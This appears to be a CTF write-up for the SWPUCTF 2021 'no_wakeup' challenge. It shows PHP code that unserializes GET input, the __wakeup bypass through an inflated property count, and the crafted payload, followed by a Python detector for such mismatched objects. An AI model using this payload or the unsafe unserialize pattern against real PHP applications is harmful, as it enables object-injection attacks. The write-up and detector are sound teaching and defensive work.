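This article was last updated on 2024-10-28T21:26:13+08:00
To begin with, we learn by working through challenges to get familiar with the topic.
Example 1: [SWPUCTF 2021 Freshman Competition] no_wakeup
Go straight to the source code: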
```php
<?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{
    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

    // Called automatically by unserialize(): replaces passwd with its SHA-1 hash
    public function __wakeup(){
        $this->passwd = sha1($this->passwd);
    }

    // Called when the object is destroyed: prints the flag only for admin / wllm
    public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "wllm"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->passwd;
            echo "No wake up";
        }
    }
}

$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);   // user-controlled input reaches unserialize()
?>
```
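Reading the write-up shows that when unserialize() is called, __wakeup() runs automatically and replaces passwd with its sha1 hash, which cannot be reversed, so we need to think about how to bypass __wakeup().
- Key point: a PHP quirk. When the value in the serialized string that gives the number of object properties is greater than the real number of properties, execution of __wakeup() is skipped.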
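```php
<?php
// Minimal local copy of the class: serialize() only needs the class and property names
class HaHaHa{ public $admin; public $passwd; }

$aa = new HaHaHa();
$aa->admin = "admin";
$aa->passwd = "wllm";
$stus = serialize($aa);
print_r($stus);
```
```
O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
```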
After serializing, we change the property count and submit the result:
```
O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
```
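From the defender's side, serialize() never emits an object whose declared property count differs from the properties that follow, so that mismatch is a usable detection signal. The following is an added example, not part of the original post: a Python check that walks PHP-serialized values found in a request parameter and reports such objects. The function names, the log line format and the `/class.php` path are assumptions; the two serialized strings are the ones shown above.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit
SCALAR = re.compile(rb'(?:N|[bidrR]:[^;{}]*);')
STRING = re.compile(rb's:(\d+):"')
CONTAINER = re.compile(rb'(?:a|O:\d+:"([^"]*)"):(\d+):\{')   # array or object header
REQUEST = re.compile(r'"GET (\S+) HTTP')                      # assumed log format

def _walk(buf, pos, findings):
    """Parse one serialized value at pos and return the offset just past it."""
    if m := SCALAR.match(buf, pos):
        return m.end()
    if m := STRING.match(buf, pos):
        end = m.end() + int(m.group(1))          # PHP string lengths are byte counts
        if buf[end:end + 2] != b'";':
            raise ValueError(f"bad string length at offset {pos}")
        return end + 2
    if not (m := CONTAINER.match(buf, pos)):
        raise ValueError(f"unsupported token at offset {pos}")
    cls, declared, pos, actual = m.group(1), int(m.group(2)), m.end(), 0
    while buf[pos:pos + 1] != b'}':
        pos = _walk(buf, pos, findings)          # property name or array key
        pos = _walk(buf, pos, findings)          # its value
        actual += 1
    if cls is not None and declared != actual:   # report objects only
        findings.append((cls.decode(errors="replace"), declared, actual))
    return pos + 1

def count_mismatches(payload):
    """Return [(class, declared, actual)] for mismatched objects, None if unparseable."""
    findings = []
    try:
        _walk(payload.encode(), 0, findings)
        return findings
    except (ValueError, RecursionError):
        return None

def scan(lines, param="p"):
    """Return (line_no, class, declared, actual) for each flagged request."""
    hits = []
    for n, line in enumerate(lines, 1):
        query = urlsplit(m.group(1)).query if (m := REQUEST.search(line)) else ""
        for raw in parse_qs(query).get(param, []):
            hits += [(n, *f) for f in count_mismatches(raw) or []]
    return hits

# Constructed log lines; the two serialized values are the ones shown on this page.
PAGE_ORIGINAL = 'O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}'
PAGE_MODIFIED = PAGE_ORIGINAL.replace('":2:{', '":3:{')
SAMPLE_LOG = [f'198.51.100.7 - - "GET /class.php?p={quote(v)} HTTP/1.1" 200' for v in (PAGE_ORIGINAL, PAGE_MODIFIED)]
```

Calling `scan(SAMPLE_LOG)` flags only the second request. Custom-serialized (`C:`) and enum (`E:`) values are not handled by this parser and come back as unparseable.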